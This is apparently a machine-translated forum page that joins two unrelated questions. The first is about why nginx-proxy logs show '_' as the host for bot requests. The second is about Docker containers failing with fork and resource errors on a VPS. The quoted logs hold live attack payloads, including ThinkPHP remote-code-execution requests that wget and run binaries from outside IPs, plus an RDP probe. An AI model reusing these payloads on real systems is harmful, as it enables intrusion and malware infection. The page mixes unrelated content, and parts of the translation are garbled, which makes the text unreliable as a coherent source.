void's questions

我在服务器上使用jwilder/nginx-proxy，可在公共互联网上访问。但实际上唯一的计数部分应该是它是 nginx。

我会定期检查各种 docker 项目的所有日志。当然，有很多来自试图攻击任何已知漏洞的机器人的请求......

还有一件事我无法对自己解释：几乎所有可疑请求都没有显示真实的域，而只是作为目的地的下划线。以下是一些示例行：

proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:14:50:06 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | 1.my.RealIP.4 31.28.227.190 - - [12/Jun/2020:14:56:59 +0000] "GET / HTTP/1.0" 503 197 "-" "-"
proxy_1  | nginx.1  | 1.my.RealIP.4 195.54.160.135 - - [12/Jun/2020:15:06:57 +0000] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 503 599 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET / HTTP/2.0" 200 3372 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | my.realDomain.com 37.120.196.172 - - [05/Jul/2020:20:49:11 +0000] "GET /favicon.ico HTTP/2.0" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
proxy_1  | nginx.1  | _ 76.71.2.171 - - [12/Jun/2020:15:25:46 +0000] "POST /spywall/timeConfig.php HTTP/1.1" 400 157 "-" "XTC"
proxy_1  | nginx.1  | _ 116.99.130.146 - - [12/Jun/2020:15:29:40 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://51.77.73.39/bins/vciamangement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp GME.ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.158.248.210 - - [12/Jun/2020:15:37:41 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://167.71.185.210/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 157 "-" "Uirusu/2.0"
proxy_1  | nginx.1  | _ 185.202.2.147 - - [05/Jul/2020:20:45:34 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 150 "-" "-"

所以，有人要求 a) 我的 IP b) 我的域名和 c) 要求...下划线？ 这条下划线表示什么？

最近我租了一个 VPS 作为私人游乐场和学习 docker。我想在 nginx-proxy 和 docker-letsencrypt-nginx-proxy-companion后面托管一些网络服务。

设置

服务器运行 Ubuntu 18.04.4 LTS，Docker版本 19.03.6，构建 369ce74a3c，docker-compose版本 1.17.1，构建未知。

4GB vRAM，4vCores（硬件在 Intel Xeon 上运行）

问题

一旦我想运行超过 8 个容器，我就会遇到错误。有一些不同的错误，我不能特别说明其中哪一个出现的时间：

• OCI runtime create failed例如，当尝试使用 mysql 将 joomla 作为 compose-project 启动时：

ERROR: for joomla_joomladb_1  Cannot start service joomladb: OCI runtime create failed:
unable to retrieve OCI runtime error (open /run/containerd/io.containerd.runtime.v1.linux/moby/741c[...]6e3/log.json:
no such file or directory): fork/exec /usr/sbin/runc: resource temporarily unavailable: unknown

• socket reset

ERROR: for joomla_joomladb_1  Cannot start service joomladb: read unix @->@/containerd-shim/24f42b8[...]32fa1.sock:
read: connection reset by peer: unknown

• pthread_create failed: Resource temporarily unavailable我现在没有任何相应的日志。如果错误再次发生，我将在此处发布它们。但一条线似乎总是parent id not found
• 分叉失败。当出现这个错误时，我不能再做任何事情了。看下一点：

此外，与此相关的是，有时我在输入任何命令时会在我的 shell 上遇到一些奇怪的错误。当服务器处于这种状态时，我既不能 su 到 root 也不能​​根据命令行重新启动。你可以看到我试图sudo在这张图片中输入：任何命令的错误。甚至关机或重启

我试过的

• 我在 Github 和其他一些人上看到了这份报告，并提到了机器上的最大任务限制。我已经将它设置为更高的音量，infinity但所有这些似乎都没有帮助。（我曾经将其更改/etc/systemd/system.conf为 per systemctl edit docker.service）。

$ systemctl show --property=DefaultTasksMax
 DefaultTasksMax=4659
$ systemctl status docker
...
  Tasks: 52
...

• 我在我的笔记本电脑上安装了完全相同的系统（除了虚拟化软件——VPS 在 Virtuozzo 上运行，我在本地使用 Quemu 和 virt-manager）——一切都按预期工作！

• 我尝试启动的任何容器都会出现问题。hello-world，其他撰写项目或已构建的项目...

• 我联系了我的托管服务提供商，也提到了上述问题，并表示他们不会限制任何使用。